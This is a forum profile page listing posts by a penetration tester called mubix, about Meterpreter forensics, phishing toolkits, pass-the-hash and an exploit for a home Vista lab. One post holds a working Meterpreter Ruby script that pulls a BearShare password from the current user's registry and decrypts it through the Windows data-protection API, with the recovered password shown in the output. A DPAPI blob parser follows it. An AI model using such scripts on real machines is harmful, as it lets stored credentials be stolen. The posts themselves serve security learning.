mubix

Posts posted by mubix

  1. Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (i.e. system profiling software, normal process execution, and hibernate respectively). The more evident parts come in a few flavors:

    • How the Meterpreter shellcode / payload gets executed.
      • Is it a binary you put your payload in? a PDF?
        • Where was it stored?
          • Is it backed up?
          • Is it in a location targeted by Volume Shadow Copies or Restore Points?
          • Does the company have a shared storage of roaming profiles?
      • How was it delivered?
        • Was the delivery encrypted?
        • Was it a single delivery or to many hosts/users?
    • What C2 mechanism is used? HTTP/TCP/DNS/etc?
      • Are the comms encrypted?
      • Do they go through a proxy?

    These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sysinternals Process Monitor on the victim. Make sure Bro, and all the other gadgets and gizmos SecurityOnion has, are enabled and in-line.

    I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.

  2. If you still have the ability to log in as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and, once logged in (as the user with BearShare installed), was still able to decrypt the BearShare password.

  3. Yeah, it was a password stored in the user's store. I wrote a quick script to decrypt it (mostly stolen from post/windows/gather/credentials/outlook.rb):

    # Meterpreter script: read the BearShare password blob from the current
    # user's registry hive and hand it to CryptUnprotectData through Railgun.

    # Load crypt32.dll into Railgun so CryptUnprotectData can be called.
    def prepare_railgun
      rg = session.railgun
      rg.add_dll('crypt32') unless rg.get_dll('crypt32')
    end

    def decrypt_password(data)
      return "" if data.nil? || data.empty?
      rg = session.railgun
      pid = client.sys.process.getpid
      process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

      # Copy the DPAPI blob into our own process so we can hand the API a pointer.
      # Allocate by the blob's real size: the blob below is longer than 128 bytes,
      # and a fixed 128 only worked because allocations round up to a page.
      mem = process.memory.allocate(data.length)
      process.memory.write(mem, data)

      # DATA_BLOB is { DWORD cbData; BYTE *pbData }; the pointer width and the
      # size of the pDataOut buffer depend on whether Meterpreter is x86 or x64.
      if client.sys.process.each_process.find { |i| i["pid"] == pid }["arch"] == "x86"
        addr = [mem].pack("V")
        len  = [data.length].pack("V")
        ret  = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
        len, addr = ret["pDataOut"].unpack("V2")
      else
        addr = [mem].pack("Q")
        len  = [data.length].pack("Q")
        ret  = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
        len, addr = ret["pDataOut"].unpack("Q2")
      end

      # pDataOut now holds the length and address of the plaintext inside our process.
      return "" if len == 0
      process.memory.read(addr, len)
    end

    # Read a value under the BearShare user key (HKCU, i.e. the logged-in user's hive).
    def get_valdata(k, name)
      @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
      key = k.empty? ? @key_base : "#{@key_base}\\#{k}"
      registry_getvaldata(key, name)
    end

    prepare_railgun
    data = get_valdata("", 'Password')
    print_error data.inspect        # raw DPAPI blob, dumped for inspection
    password = decrypt_password(data)
    print_status password.inspect
    

    And I got the following output when logged in as Administrator (who installed BearShare) with the password of 'password':

    meterpreter > run decrypt_bearshare
    [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
    x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
    0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
    \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
    x9E\xC11.d\x96\x95 \xC6"
    [*] "password\x00"
    I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

    meterpreter > run decrypt_bearshare
    [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
    x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
    0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
    \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
    x9E\xC11.d\x96\x95 \xC6"
    [*] ""
    No joy (as expected)
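    The reason bob gets nothing back is visible in the blob itself. The following is an added example, not mubix's script: it parses the header of the DPAPI blob printed above (re-typed here as hex from that output) without decrypting anything, and shows that the blob names the master key GUID of the user who encrypted it. That master key lives under that user's profile and is derived from that user's password, so copying the registry value to another account cannot work. The CALG names and the CRYPTPROTECT_LOCAL_MACHINE flag value come from wincrypt.h.

```ruby
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb" # fixed GUID after the version DWORD
CRYPTPROTECT_LOCAL_MACHINE = 0x4                           # flag bit: machine scope instead of user
CALG_NAMES = { 0x6603 => "CALG_3DES", 0x6610 => "CALG_AES_256", 0x8004 => "CALG_SHA1" }.freeze

# The BearShare Password value from the output above, re-typed as hex (184 bytes):
# version, provider GUID, master key version + GUID, flags, description ("EncryptedString"),
# crypt alg + bits, salt, strong-entropy len, hash alg + bits, HMAC key, ciphertext, signature.
BEARSHARE_BLOB = [%w[
  01000000 d08c9ddf0115d1118c7a00c04fc297eb 01000000 ec01fb9780d7714695a7366226c83755
  00000000 20000000 45006e00630072007900700074006500640053007400720069006e0067000000
  03660000 a8000000 10000000 1097e4a56dcd855049c6371d61b4bb3c 00000000 04800000 a0000000
  10000000 06c8019cb74910424c147b9df5ec7007 10000000 d8f40b42e828fb5ef29f10fc3e636e47
  14000000 c57a07d33fd7de7a300ed89ec1312e64969520c6
].join].pack("H*").freeze

# Little-endian GUID bytes -> canonical "8-4-4-4-12" string.
def guid_le(bytes)
  d1, d2, d3, tail = bytes.unpack("VvvH16")
  format("%08x-%04x-%04x-%s-%s", d1, d2, d3, tail[0, 4], tail[4, 12])
end

# DWORD length followed by that many bytes -> [bytes, next offset]; refuses truncated input.
def read_lv(blob, off)
  len = blob[off, 4].to_s.unpack1("V")
  raise ArgumentError, "truncated blob" if len.nil? || off + 4 + len > blob.bytesize
  [blob[off + 4, len], off + 4 + len]
end

# Parse only the header of a CryptProtectData blob; nothing here decrypts anything.
def parse_dpapi_blob(blob)
  blob = blob.b
  raise ArgumentError, "not a DPAPI blob" unless blob.bytesize > 44 &&
    blob.unpack1("V") == 1 && guid_le(blob[4, 16]) == DPAPI_PROVIDER_GUID
  flags = blob[40, 4].unpack1("V")
  desc, off = read_lv(blob, 44)
  crypt_alg, crypt_bits = blob[off, 8].to_s.unpack("VV")
  salt, off = read_lv(blob, off + 8)
  _strong, off = read_lv(blob, off)
  hash_alg, hash_bits = blob[off, 8].to_s.unpack("VV")
  _hmac_key, off = read_lv(blob, off + 8)
  data, off = read_lv(blob, off)
  sign, off = read_lv(blob, off)
  raise ArgumentError, "trailing bytes after signature" unless off == blob.bytesize
  { masterkey_guid: guid_le(blob[24, 16]),   # the file under %APPDATA%\Microsoft\Protect\<SID>\
    scope: (flags & CRYPTPROTECT_LOCAL_MACHINE).zero? ? "user" : "machine",
    description: desc.force_encoding("UTF-16LE").encode("UTF-8").delete("\0"),
    crypt_alg: CALG_NAMES.fetch(crypt_alg, format("0x%x", crypt_alg)), crypt_bits: crypt_bits,
    hash_alg: CALG_NAMES.fetch(hash_alg, format("0x%x", hash_alg)), hash_bits: hash_bits,
    salt_hex: salt.unpack1("H*"), ciphertext_bytes: data.bytesize, signature_bytes: sign.bytesize }
end
```

    For the blob above this reports scope "user" and master key 97fb01ec-d780-4671-95a7-366226c83755, which is exactly the key bob's profile does not have.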

  4. I would start with SET (Social Engineering Toolkit) and look at how it does things. There is also SEF (Social Engineering Framework), MetaPhish, and Spear Fishing Toolkit. I think there is also one called FBPwn but I think it's just Java Applet + Facebook.

  5. Hi

    I'm using Armitage and Metasploit.

    I'm trying to attack a Windows Vista machine at my home. The target machine is mine.

    The only machine that I have been able to attack and gain access to is Windows 2000.

    So what exploits should I use? Please help me, I'm just trying to learn to use Metasploit.

    What is the machine vulnerable to? What patches have been applied? Are you looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.

  6. I have a lot of work to do on camera, and hopefully that is something that I can keep getting better at going forward. That's very cool that you're working in bio exploitation. Which field?

    I have a make-up Metasploit segment in the queue; it's really hard to know when you aren't up to par when there's no one to give you instant feedback now that there is no hakhouse.

  7. You can use pass-the-hash, where you don't know the password, but you have the hash. Many organizations use the same password for the local admin on all the boxes in an environment; since an NTLM or LM hash is the same for the same password no matter what box you have the account on, that hash can act just like the password.

  8. Hahaha shit... Yeah that is from Mubix. Probably the worst guest the show keeps bringing back. Are you fucking kidding me? I assume Mubix is part of a team. I assume they're bringing unpublished she-at to the table, nope. They're just making a tag line to attract hack-forum members.

    Thanks for the constructive criticism. What don't you like about it?

  9. I can't believe Mubix was so rude about Mac OS X not being a 'proper platform'; it kind of undermined any respect he may have built up in previous episodes. He just sounded like a 14-year-old script kid.

    Mac OS X doesn't allow access to /dev/mem presumably for security reasons.

    It was all in fun. I will actually be obtaining my first Mac in the not so distant future. I apologize if my comment offended you or any way hindered your respect for me.

  10. I just saw a post on mubix's blog in which he mentioned ServifyThis (hxxp://www.inguardians.com/pubs/servifythis/). It looks like an interesting tool and maybe could be featured in a future episode?

    I love the tool and I think that's an awesome idea.
